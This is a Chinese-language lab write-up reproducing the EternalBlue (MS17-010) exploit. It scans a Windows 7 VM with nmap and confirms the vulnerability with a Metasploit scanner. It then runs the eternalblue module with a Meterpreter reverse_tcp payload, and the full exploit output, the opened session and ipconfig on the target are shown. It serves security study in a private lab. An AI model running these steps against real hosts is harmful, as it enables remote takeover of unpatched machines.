永恒之蓝漏洞复现
环境信息
system:kali
ipaddr:192.168.10.222
netmask:255.255.255.0
gateway:192.168.10.254system:windows 7
ipaddr:192.168.10.10
netmask:255.255.255.0
gateway:192.168.10.254
kali
使用nmap工具扫描192.168.10.10主机
nmap 192.168.10.10
--------------------
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 18:40 EST
Nmap scan report for 192.168.10.10 #192.168.10.10的扫描报告
Host is up (0.00043s latency). #主机已开启
Not shown: 997 filtered tcp ports (no-response) #未显示:997个过滤的tcp端口(未响应)
PORT STATE SERVICE #端口 状态 服务
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds #这个是我们需要攻击的端口
MAC Address: 00:0C:29:46:B5:9F (VMware) #MAC地址:00:0C:29:46:B5:9F(VMware)
Nmap scan report for 192.168.10.222 #这些是kali自己的,都已忽略
Host is up (0.0000030s latency).
All 1000 scanned ports on 192.168.10.222 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (2 hosts up) scanned in 32.78 seconds
--------------------启动msf
msfconsole查找ms17_010代码
msf6 > search ms17_010 #查找ms17_010代码
--------------------
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
--------------------选择攻击模块
msf6 > use 3查看当前模块配置选项
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
--------------------
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/name yes List of named pipes to check
d_pipes.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
oit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
--------------------填写配置项并运行
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.10.10
rhost => 192.168.10.10
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
--------------------
[+] 192.168.10.10:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.10.10:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
--------------------选择攻击模块
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 0查看当前模块配置选项
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
--------------------
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standa
rd 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7
target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
chines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.10.222 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
--------------------填写配置项
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.10.10
rhosts => 192.168.10.10发动攻击
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
--------------------
[*] Started reverse TCP handler on 192.168.10.222:4444
[*] 192.168.10.10:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.10:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.10.10:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.10.10:445 - The target is vulnerable.
[*] 192.168.10.10:445 - Connecting to target for exploitation.
[+] 192.168.10.10:445 - Connection established for exploitation.
[+] 192.168.10.10:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.10:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.10.10:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
[*] 192.168.10.10:445 - 0x00000010 72 69 73 65 20 37 36 30 30 rise 7600
[+] 192.168.10.10:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.10:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.10:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.10:445 - Starting non-paged pool grooming
[+] 192.168.10.10:445 - Sending SMBv2 buffers
[+] 192.168.10.10:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.10:445 - Sending final SMBv2 buffers.
[*] 192.168.10.10:445 - Sending last fragment of exploit packet!
[*] 192.168.10.10:445 - Receiving response from exploit packet
[+] 192.168.10.10:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.10:445 - Sending egg to corrupted connection.
[*] 192.168.10.10:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.10.10
[*] Meterpreter session 1 opened (192.168.10.222:4444 -> 192.168.10.10:49161) at 2023-12-21 23:32:27 -0500
[+] 192.168.10.10:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.10:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.10:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--------------------查看靶机IP
meterpreter > ipconfig
--------------------
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:46:b5:9f
MTU : 1500
IPv4 Address : 192.168.10.10
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::75a3:353c:945f:cc77
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:a0a
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
--------------------
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 Vincent Cassano
